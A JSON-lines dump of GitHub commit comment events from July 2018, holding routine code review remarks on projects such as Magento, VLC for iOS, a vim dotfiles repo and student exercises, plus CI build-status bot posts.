{"id":"7928680490","type":"CommitCommentEvent","actor":{"login":"Renu05"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29620793,"position":14,"line":49,"path":"app/code/Magento/SalesRule/Model/ResourceModel/Coupon/Usage.php","commit_id":"cda78359e5bffd720381b022be99a72a13856a34","created_at":"2018-07-06T12:37:58Z","updated_at":"2018-07-06T12:37:58Z","author_association":"NONE","body":" **First Order Placed by Customer and Coupon Code Applied :**\r\nWhen customer has canceled this order, in that case we need to delete the record from salesrule_coupon_usage  table otherwise it will not allow customer to place an order in frontend with the same coupon.\r\n\r\nSame is applicable for No Coupon Rules. For this scenario we need to delete the record from salesrule_customer.\r\n\r\nHere is the code \r\n$updatedTimeUsed = $timesUsed - 1;\r\n if ($updatedTimeUsed == 0) {\r\n                $connection->delete(\r\n                    $tableName,\r\n                    ['coupon_id = ?' => $couponId, 'customer_id = ?' => $customerId]\r\n                );\r\n            }\r\n "}},"created_at":"2018-07-06T12:37:58Z"}
{"id":"7928681129","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"lanl/LATTE"},"payload":{"comment":{"id":29620795,"position":null,"line":null,"path":null,"commit_id":"61223bbc7d954534bc303920374878fa8bdae13a","created_at":"2018-07-06T12:38:08Z","updated_at":"2018-07-06T12:38:08Z","author_association":"MEMBER","body":"@cnegre please avoid force pushes in the future that messed up the mirroring to https://gitlab.com/exaalt/LATTE."}},"created_at":"2018-07-06T12:38:08Z"}
{"id":"7928684985","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620807,"position":13,"line":31,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"b641688fedb71d6ff33399da119644b346d0c86b","created_at":"2018-07-06T12:38:57Z","updated_at":"2018-07-06T12:38:57Z","author_association":"OWNER","body":"It's was for a Xcode category for easier reading :D"}},"created_at":"2018-07-06T12:38:57Z"}
{"id":"7928685972","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"AyushiG123/chatarang"},"payload":{"comment":{"id":29620810,"position":null,"line":null,"path":null,"commit_id":"2148234c8448c824147573de18bc501c52a1d071","created_at":"2018-07-06T12:39:11Z","updated_at":"2018-07-06T12:39:11Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T12:39:11Z"}
{"id":"7928686806","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620812,"position":46,"line":46,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"559dd33920f3c129f3ad229befe8a1ebad119c67","created_at":"2018-07-06T12:39:22Z","updated_at":"2018-07-06T12:39:22Z","author_association":"OWNER","body":"Should I try to re-init?"}},"created_at":"2018-07-06T12:39:22Z"}
{"id":"7928687061","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"AyushiG123/chatarang"},"payload":{"comment":{"id":29620815,"position":null,"line":null,"path":null,"commit_id":"3e1634525b7f731035e583526a57756ad3a05d55","created_at":"2018-07-06T12:39:25Z","updated_at":"2018-07-06T12:39:25Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:39:25Z"}
{"id":"7928687359","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/FSyncMS"},"payload":{"comment":{"id":29620817,"position":null,"line":null,"path":null,"commit_id":"360a494fd4f910c4cf88f4ffa2032ace51856c32","created_at":"2018-07-06T12:39:29Z","updated_at":"2018-07-06T12:39:29Z","author_association":"MEMBER","body":"Issue #7 part 2"}},"created_at":"2018-07-06T12:39:29Z"}
{"id":"7928689215","type":"CommitCommentEvent","actor":{"login":"huyvohcmc"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29620821,"position":79,"line":63,"path":"init.vim","commit_id":"a1cdb1621422c940b134aaf59296335eb7aa8a45","created_at":"2018-07-06T12:39:52Z","updated_at":"2018-07-06T12:39:52Z","author_association":"OWNER","body":"What does `et` means?"}},"created_at":"2018-07-06T12:39:52Z"}
{"id":"7928691634","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620830,"position":10,"line":46,"path":"SharedSources/MediaDataSourceAndDelegate.swift","commit_id":"8dba5657c1d70225273c4818e75389a22eb5fb27","created_at":"2018-07-06T12:40:20Z","updated_at":"2018-07-06T12:40:20Z","author_association":"NONE","body":"leftover debug :)"}},"created_at":"2018-07-06T12:40:20Z"}
{"id":"7928696807","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620842,"position":10,"line":46,"path":"SharedSources/MediaDataSourceAndDelegate.swift","commit_id":"8dba5657c1d70225273c4818e75389a22eb5fb27","created_at":"2018-07-06T12:41:25Z","updated_at":"2018-07-06T12:41:25Z","author_association":"OWNER","body":"Indeed, it's still a case I'm not sure how to handle(about files being empty) (-ω-、)"}},"created_at":"2018-07-06T12:41:25Z"}
{"id":"7928697484","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29620843,"position":79,"line":63,"path":"init.vim","commit_id":"a1cdb1621422c940b134aaf59296335eb7aa8a45","created_at":"2018-07-06T12:41:34Z","updated_at":"2018-07-06T12:41:34Z","author_association":"NONE","body":"It's short form of `expandtab`.\r\n\r\n`: set ts=4 et` and `set tabstop=4 expandtab` are the same."}},"created_at":"2018-07-06T12:41:34Z"}
{"id":"7928703762","type":"CommitCommentEvent","actor":{"login":"balusai"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29620857,"position":14,"line":49,"path":"app/code/Magento/SalesRule/Model/ResourceModel/Coupon/Usage.php","commit_id":"cda78359e5bffd720381b022be99a72a13856a34","created_at":"2018-07-06T12:42:58Z","updated_at":"2018-07-06T12:42:58Z","author_association":"NONE","body":"Thank you @Renu05 "}},"created_at":"2018-07-06T12:42:58Z"}
{"id":"7928705869","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29620864,"position":null,"line":null,"path":null,"commit_id":"fba1b1a4f93cb3588e4d127bbaf50a36f1fe91ab","created_at":"2018-07-06T12:43:28Z","updated_at":"2018-07-06T12:43:28Z","author_association":"NONE","body":"あっ、惜しかったのにコードが勿体無い状態になってる^^;\r\n\r\n大ヒント出しておきます。次回講義までの修正で再評価しますね。\r\n・print()関数の中での代入は禁止します。事前にsum_vを計算して、それをprintで出力してください。\r\n　sum_v = (計算)\r\n　print(sum_v)\r\n　といった具合です。\r\n\r\nまた、変数に格納した計算結果(paymentがそうなのかな?)が間違えています。\r\n今の状態だと、全体の合計に0.8掛けちゃってますね。2割引は焼鳥のみです。\r\n\r\n改善点をまとめますね。\r\n計算過程としては1行目の式でほぼ合っています。ので、落ち着いて下記の手順でコードを書いてみましょうか。\r\n1. 最終的な支払い金額をpaymentとし、そこにまずは1行目の計算を代入してみます。\r\n2. payment = (1行目のprintのカッコの中身) 、と修正\r\n3. それぞれの数字を、定義した変数(beal_vとか)に書き換える\r\n　※ポイントカードの値引き分を格納した変数がないですね。これは追加してください。\r\n4. print(payment)\r\nで、正しい結果が表示されるはずです。sum_vの部分は消して良いと思います。\r\n\r\nあと、これは余裕あればで構いませんが、割引率は2割なので、\r\nrateには0.8でなく、0.2を代入して欲しいです。\r\nそうした後、計算する時点で、\r\n(200 * 2) + (100) + ((100 * (1 - 0.2)) * 2) - 150\r\nのような形で、計算の中で0.2を引いて計算してくださいね。\r\n(実際には変数を使って計算してください。)"}},"created_at":"2018-07-06T12:43:28Z"}
{"id":"7928707294","type":"CommitCommentEvent","actor":{"login":"VadymSV"},"repo":{"name":"Appboy/appboy-xamarin-bindings"},"payload":{"comment":{"id":29620867,"position":10,"line":7,"path":"appboy-component/samples/android/TestApp.XamarinAndroid/Properties/AndroidManifest.xml","commit_id":"890557c894b16b218bdf3878b6285c38c4b0db3f","created_at":"2018-07-06T12:43:46Z","updated_at":"2018-07-06T12:43:46Z","author_association":"NONE","body":"Do I need this in AndroidManifest if FCM used?"}},"created_at":"2018-07-06T12:43:46Z"}
{"id":"7928709720","type":"CommitCommentEvent","actor":{"login":"carolanitz"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620874,"position":13,"line":31,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"b641688fedb71d6ff33399da119644b346d0c86b","created_at":"2018-07-06T12:44:19Z","updated_at":"2018-07-06T12:44:19Z","author_association":"NONE","body":"This is for structuring your code \r\n![screen shot 2018-07-06 at 2 43 35 pm](https://user-images.githubusercontent.com/2445653/42379479-0e8dfef6-812b-11e8-98c6-a5e9aee85d88.png)\r\n"}},"created_at":"2018-07-06T12:44:19Z"}
{"id":"7928711180","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620877,"position":46,"line":46,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"559dd33920f3c129f3ad229befe8a1ebad119c67","created_at":"2018-07-06T12:44:36Z","updated_at":"2018-07-06T12:44:36Z","author_association":"NONE","body":"You'd need to re-add the entrypoints that the user wants to discover, although in iOS case, that's probably easier to simply always call `discover(<path to app>)`.\r\n\r\nIf the path was already discovered, then the medialibrary won't care"}},"created_at":"2018-07-06T12:44:36Z"}
{"id":"7928711921","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620880,"position":46,"line":46,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"559dd33920f3c129f3ad229befe8a1ebad119c67","created_at":"2018-07-06T12:44:46Z","updated_at":"2018-07-06T12:44:46Z","author_association":"NONE","body":"s/discovered/added to the list of entrypoints/"}},"created_at":"2018-07-06T12:44:46Z"}
{"id":"7928712872","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29620881,"position":null,"line":null,"path":null,"commit_id":"fec06b5e3218a3c2be1ccebcc9f91f77920b9612","created_at":"2018-07-06T12:44:58Z","updated_at":"2018-07-06T12:44:58Z","author_association":"COLLABORATOR","body":"@Fourdee \r\nCould you ask him, if green looking test (command prompt as well) is really green or just from the angle of the picture?\r\nAs \"bold\" text doesn't seem to be supported on his terminal, handled different or really just makes the text bold, but not rises the colour, maybe just using `\\e[1m` to rise default white to bright/bold white has some unintended effect.\r\n\r\nAlso during colour code changes I merged some codes together, e.g. just use `\\e[1;30m` for bright black/grey and then `\\e[33m` leads to bright green, as the \"bold\" style stays active (of not reset). This was also the reason for the missed `\\e[30m`, where \"bold\" was still active, on v6.11. When using `\\e[90m` again, the \"bold\" needs to be re-added or actively reset, if not wanted: https://github.com/Fourdee/DietPi/commit/d7e9a5e38a4cb9eccfcd81fbdc473242dd6a3c3c\r\n\r\nI will go through the code again to check for inconsistencies. Sorry for the mess that this colour change caused 😅."}},"created_at":"2018-07-06T12:44:58Z"}
{"id":"7928713278","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"charlorr/TikTalk"},"payload":{"comment":{"id":29620886,"position":null,"line":null,"path":null,"commit_id":"9a9bf5ac0a8bb99c17ffaa3941c8d15c850cca18","created_at":"2018-07-06T12:45:04Z","updated_at":"2018-07-06T12:45:04Z","author_association":"NONE","body":"This is a huge commit message! :) I assume you were just catching up, but in the future try to make smaller commits along the way! "}},"created_at":"2018-07-06T12:45:04Z"}
{"id":"7928714011","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"charlorr/TikTalk"},"payload":{"comment":{"id":29620888,"position":null,"line":null,"path":null,"commit_id":"fbafc35f7ae2760af8d4ccc8996b3b9ab7c82750","created_at":"2018-07-06T12:45:13Z","updated_at":"2018-07-06T12:45:13Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:45:13Z"}
{"id":"7928718337","type":"CommitCommentEvent","actor":{"login":"carolanitz"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620898,"position":4,"line":37,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"9da29a9cf1ff0f57f744659e788dbb7c0a17499d","created_at":"2018-07-06T12:46:07Z","updated_at":"2018-07-06T12:46:07Z","author_association":"NONE","body":"is it also possible to just have medialibrary.verbosity = .info ? "}},"created_at":"2018-07-06T12:46:07Z"}
{"id":"7928720112","type":"CommitCommentEvent","actor":{"login":"huyvohcmc"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29620902,"position":79,"line":63,"path":"init.vim","commit_id":"a1cdb1621422c940b134aaf59296335eb7aa8a45","created_at":"2018-07-06T12:46:29Z","updated_at":"2018-07-06T12:46:29Z","author_association":"OWNER","body":"One more thing, is there any reason to set `expantab` after `tabstop`?"}},"created_at":"2018-07-06T12:46:29Z"}
{"id":"7928720157","type":"CommitCommentEvent","actor":{"login":"navneetkr123"},"repo":{"name":"navneetkr123/LCM-of-number-in-python"},"payload":{"comment":{"id":29620903,"position":null,"line":null,"path":null,"commit_id":"e33feb88d21543ec9531aea962d26b42da9a4f73","created_at":"2018-07-06T12:46:30Z","updated_at":"2018-07-06T12:46:30Z","author_association":"OWNER","body":"\r\n[lcm.txt](https://github.com/navneetkr123/LCM-of-number-in-python/files/2170530/lcm.txt)\r\n\r\n    \r\n        \r\n     \r\n"}},"created_at":"2018-07-06T12:46:30Z"}
{"id":"7928720716","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620906,"position":10,"line":46,"path":"SharedSources/MediaDataSourceAndDelegate.swift","commit_id":"8dba5657c1d70225273c4818e75389a22eb5fb27","created_at":"2018-07-06T12:46:37Z","updated_at":"2018-07-06T12:46:37Z","author_association":"NONE","body":"Before `IMediaLibraryCb::onReloadCompleted` gets called: ignore\r\nAfter: I'd say assert\r\n\r\nBut it's probably not a good idea to have a special case/boolean to know if reload has completed... so all in all... Just ignore & return ASAP IMO"}},"created_at":"2018-07-06T12:46:37Z"}
{"id":"7928723471","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29620913,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T12:47:14Z","updated_at":"2018-07-06T12:47:14Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T12:47:14Z"}
{"id":"7928725006","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620916,"position":4,"line":37,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"9da29a9cf1ff0f57f744659e788dbb7c0a17499d","created_at":"2018-07-06T12:47:33Z","updated_at":"2018-07-06T12:47:33Z","author_association":"OWNER","body":"not with the current framwork, but we can change it"}},"created_at":"2018-07-06T12:47:33Z"}
{"id":"7928729140","type":"CommitCommentEvent","actor":{"login":"jaewonYoon"},"repo":{"name":"jaewonYoon/web1"},"payload":{"comment":{"id":29620925,"position":null,"line":null,"path":null,"commit_id":"fadee270ec2a8bc7aa843556ae9a3e2dd842fc71","created_at":"2018-07-06T12:48:26Z","updated_at":"2018-07-06T12:48:26Z","author_association":"OWNER","body":"event listener "}},"created_at":"2018-07-06T12:48:26Z"}
{"id":"7928729434","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29620926,"position":79,"line":63,"path":"init.vim","commit_id":"a1cdb1621422c940b134aaf59296335eb7aa8a45","created_at":"2018-07-06T12:48:29Z","updated_at":"2018-07-06T12:48:29Z","author_association":"NONE","body":"Nope, you can set before or after, it doesn't matter at all. Those are two different settings. They are not related to each other."}},"created_at":"2018-07-06T12:48:29Z"}
{"id":"7928730140","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29620928,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T12:48:39Z","updated_at":"2018-07-06T12:48:39Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T12:48:39Z"}
{"id":"7928731152","type":"CommitCommentEvent","actor":{"login":"andredarcie"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29620933,"position":null,"line":null,"path":null,"commit_id":"83fac017f96f34c92c3578796a7ddb443d4e1f17","created_at":"2018-07-06T12:48:53Z","updated_at":"2018-07-06T12:48:53Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-06T12:48:53Z"}
{"id":"7928732795","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"SkyOcean00/dwarf-underground"},"payload":{"comment":{"id":29620936,"position":null,"line":null,"path":null,"commit_id":"bb3336e120b6e5b51ac3562031b35445895644cf","created_at":"2018-07-06T12:49:15Z","updated_at":"2018-07-06T12:49:15Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:49:15Z"}
{"id":"7928733785","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"SkyOcean00/dwarf-underground"},"payload":{"comment":{"id":29620939,"position":null,"line":null,"path":null,"commit_id":"678bfc46c1060ec981f88bc6015683c88c23e136","created_at":"2018-07-06T12:49:28Z","updated_at":"2018-07-06T12:49:28Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:49:28Z"}
{"id":"7928734863","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"SkyOcean00/dwarf-underground"},"payload":{"comment":{"id":29620941,"position":null,"line":null,"path":null,"commit_id":"617a6d18e81fbcaf5d53b811adda4a135459c4e3","created_at":"2018-07-06T12:49:42Z","updated_at":"2018-07-06T12:49:42Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-06T12:49:42Z"}
{"id":"7928735535","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"SkyOcean00/dwarf-underground"},"payload":{"comment":{"id":29620943,"position":null,"line":null,"path":null,"commit_id":"4690a2c13b6b51261a919d83b88825848a6967b2","created_at":"2018-07-06T12:49:50Z","updated_at":"2018-07-06T12:49:50Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:49:50Z"}
{"id":"7928736758","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"SkyOcean00/dwarf-underground"},"payload":{"comment":{"id":29620945,"position":null,"line":null,"path":null,"commit_id":"d08bf6f4f687038b06a0bd4a7da6024a50266382","created_at":"2018-07-06T12:50:06Z","updated_at":"2018-07-06T12:50:06Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:50:06Z"}
{"id":"7928739272","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"SkyOcean00/dwarf-underground"},"payload":{"comment":{"id":29620950,"position":null,"line":null,"path":null,"commit_id":"909b7725bb78c97a7d445f4555db1ed02be53ffe","created_at":"2018-07-06T12:50:35Z","updated_at":"2018-07-06T12:50:35Z","author_association":"NONE","body":"Try to write a better commit message so you know what the code is changing. Good work."}},"created_at":"2018-07-06T12:50:35Z"}
{"id":"7928742859","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"ColinHayes985/Chatarang"},"payload":{"comment":{"id":29620954,"position":null,"line":null,"path":null,"commit_id":"8d0358b98b2156181b7d4b55b725dca68ec8f92e","created_at":"2018-07-06T12:51:19Z","updated_at":"2018-07-06T12:51:19Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:51:19Z"}
{"id":"7928744360","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"ColinHayes985/Chatarang"},"payload":{"comment":{"id":29620963,"position":null,"line":null,"path":null,"commit_id":"7add6f2349f154e0108dce806067fa3b08c31fc5","created_at":"2018-07-06T12:51:36Z","updated_at":"2018-07-06T12:51:36Z","author_association":"NONE","body":"Nice work 👍 "}},"created_at":"2018-07-06T12:51:36Z"}
{"id":"7928744975","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620964,"position":10,"line":52,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"565d3e1f4b8f6f48a7d3622a968018eee3f1ccf0","created_at":"2018-07-06T12:51:44Z","updated_at":"2018-07-06T12:51:44Z","author_association":"OWNER","body":"reload() and discover() yes"}},"created_at":"2018-07-06T12:51:44Z"}
{"id":"7928745295","type":"CommitCommentEvent","actor":{"login":"carolanitz"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620965,"position":10,"line":46,"path":"SharedSources/MediaDataSourceAndDelegate.swift","commit_id":"8dba5657c1d70225273c4818e75389a22eb5fb27","created_at":"2018-07-06T12:51:48Z","updated_at":"2018-07-06T12:51:48Z","author_association":"NONE","body":"you shouldn't get into this part of the code if the files are empty these should be ideally sorted out I'd say "}},"created_at":"2018-07-06T12:51:48Z"}
{"id":"7928745335","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"ColinHayes985/Chatarang"},"payload":{"comment":{"id":29620966,"position":null,"line":null,"path":null,"commit_id":"977aa3e032d2dcb86f206f1871e314e60dee5ca1","created_at":"2018-07-06T12:51:48Z","updated_at":"2018-07-06T12:51:48Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T12:51:48Z"}
{"id":"7928745436","type":"CommitCommentEvent","actor":{"login":"KD4Z"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29620967,"position":5,"line":84,"path":"DMRLookup.cpp","commit_id":"9d6bcb7ec880d8b8a97e4b9383724e57f31948fb","created_at":"2018-07-06T12:51:50Z","updated_at":"2018-07-06T12:51:50Z","author_association":"CONTRIBUTOR","body":"\"find\" strips off the first name to be compatible with prior usage.  findWithName just returns the whole string, which now contains name due to the change in line 170 having the comment \"// tokenize to eol to capture name as well\""}},"created_at":"2018-07-06T12:51:50Z"}
{"id":"7928746484","type":"CommitCommentEvent","actor":{"login":"JakNat"},"repo":{"name":"JakNat/Linear-regression-desktop-app"},"payload":{"comment":{"id":29620969,"position":null,"line":null,"path":null,"commit_id":"8e11cb7a1a22cda600c13cba5d3c56125450f5aa","created_at":"2018-07-06T12:52:03Z","updated_at":"2018-07-06T12:52:03Z","author_association":"OWNER","body":"![reg](https://user-images.githubusercontent.com/29101386/42379777-207b8cd6-812c-11e8-8560-5fa023e0c649.png)\r\n"}},"created_at":"2018-07-06T12:52:03Z"}
{"id":"7928747320","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"ColinHayes985/Chatarang"},"payload":{"comment":{"id":29620971,"position":null,"line":null,"path":null,"commit_id":"90e7882620d453d72fa64bb2d8a28ce0c0122df1","created_at":"2018-07-06T12:52:14Z","updated_at":"2018-07-06T12:52:14Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:52:14Z"}
{"id":"7928749644","type":"CommitCommentEvent","actor":{"login":"pantheon-upstream"},"repo":{"name":"pantheon-systems/example-drops-8-composer"},"payload":{"comment":{"id":29620976,"position":null,"line":null,"path":null,"commit_id":"e39ad8e18a04aa2205301e40b86e9fd1fc557108","created_at":"2018-07-06T12:52:44Z","updated_at":"2018-07-06T12:52:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [ci-example-d8-composer#ci-1288](https://dashboard.pantheon.io/sites/c401fd14-f745-4e51-9af2-f30b45146a0c#ci-1288).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1288-ci-example-d8-composer.pantheonsite.io/)"}},"created_at":"2018-07-06T12:52:44Z"}
{"id":"7928750300","type":"CommitCommentEvent","actor":{"login":"crssi"},"repo":{"name":"crssi/Firefox"},"payload":{"comment":{"id":29620977,"position":null,"line":null,"path":null,"commit_id":"6a9bf3074e198942b5884cc2228d84313523d57e","created_at":"2018-07-06T12:52:54Z","updated_at":"2018-07-06T12:52:54Z","author_association":"OWNER","body":"browser.startup.page = 0 is now part of ghacks user.js"}},"created_at":"2018-07-06T12:52:54Z"}
{"id":"7928753743","type":"CommitCommentEvent","actor":{"login":"joaquin-herrero"},"repo":{"name":"viaduck/mariadbpp"},"payload":{"comment":{"id":29620991,"position":4,"line":13,"path":"include/mariadb++/types.hpp","commit_id":"7db2285d1c6ffe02f3e2ffa2bfb1f91fa0cf04d5","created_at":"2018-07-06T12:53:38Z","updated_at":"2018-07-06T12:53:38Z","author_association":"NONE","body":"I'm on Debian 9.\r\n\r\nI link mariadbpp against mariadbclient generated from sources [here](https://github.com/MariaDB/mariadb-connector-c).\r\n\r\nI have packetized both libraries with conan. For an easy integration too."}},"created_at":"2018-07-06T12:53:38Z"}
{"id":"7928756166","type":"CommitCommentEvent","actor":{"login":"JakNat"},"repo":{"name":"JakNat/Linear-regression-desktop-app"},"payload":{"comment":{"id":29620996,"position":null,"line":null,"path":null,"commit_id":"8e11cb7a1a22cda600c13cba5d3c56125450f5aa","created_at":"2018-07-06T12:54:09Z","updated_at":"2018-07-06T12:54:09Z","author_association":"OWNER","body":"![reg2](https://user-images.githubusercontent.com/29101386/42379835-69f3c162-812c-11e8-8177-0942e329c51d.png)\r\n"}},"created_at":"2018-07-06T12:54:09Z"}
{"id":"7928756681","type":"CommitCommentEvent","actor":{"login":"KangOl"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29621001,"position":13,"line":93,"path":"addons/sms/static/src/js/sms_widget.js","commit_id":"f9a68d5e778da0ff4e1f1a0936b51b98a822a15a","created_at":"2018-07-06T12:54:15Z","updated_at":"2018-07-06T12:54:15Z","author_association":"CONTRIBUTOR","body":"😞 https://www.odoo.com/documentation/11.0/reference/translations.html#blocks"}},"created_at":"2018-07-06T12:54:15Z"}
{"id":"7928758646","type":"CommitCommentEvent","actor":{"login":"omerdn1"},"repo":{"name":"omerdn1/omerdn1.github.io"},"payload":{"comment":{"id":29621007,"position":null,"line":null,"path":null,"commit_id":"e367210f03b868c6b27b444f022a5f57d231b6e9","created_at":"2018-07-06T12:54:40Z","updated_at":"2018-07-06T12:54:40Z","author_association":"OWNER","body":"@DoctorDevice very important huh?"}},"created_at":"2018-07-06T12:54:40Z"}
{"id":"7928759176","type":"CommitCommentEvent","actor":{"login":"lmongalo"},"repo":{"name":"lmongalo/Tensorflow-langauge-translation"},"payload":{"comment":{"id":29621009,"position":null,"line":null,"path":null,"commit_id":"d8ee733002faaa9f4e244d1f72ff9111949e3d9a","created_at":"2018-07-06T12:54:47Z","updated_at":"2018-07-06T12:54:47Z","author_association":"OWNER","body":"The script text_generation_rnn_with_beam_search.py is a text generating script."}},"created_at":"2018-07-06T12:54:47Z"}
{"id":"7928759982","type":"CommitCommentEvent","actor":{"login":"vipslord"},"repo":{"name":"Doc999tor/Customers-details"},"payload":{"comment":{"id":29621014,"position":5,"line":50,"path":"app/components/home/components/media-modal/media-modal.jsx","commit_id":"d75dcafe9529b42abd43ace9f53a27e6335bd464","created_at":"2018-07-06T12:54:57Z","updated_at":"2018-07-06T12:54:57Z","author_association":"COLLABORATOR","body":"Use const/let instead"}},"created_at":"2018-07-06T12:54:57Z"}
{"id":"7928760739","type":"CommitCommentEvent","actor":{"login":"cmdcolin"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29621019,"position":null,"line":null,"path":null,"commit_id":"ba7c6821db242c9ac4ab6572ff5e52e8189cd518","created_at":"2018-07-06T12:55:08Z","updated_at":"2018-07-06T12:55:08Z","author_association":"CONTRIBUTOR","body":"Any reason for this? I know the watch process can occasionally die but this way sort of kills my computers performance"}},"created_at":"2018-07-06T12:55:08Z"}
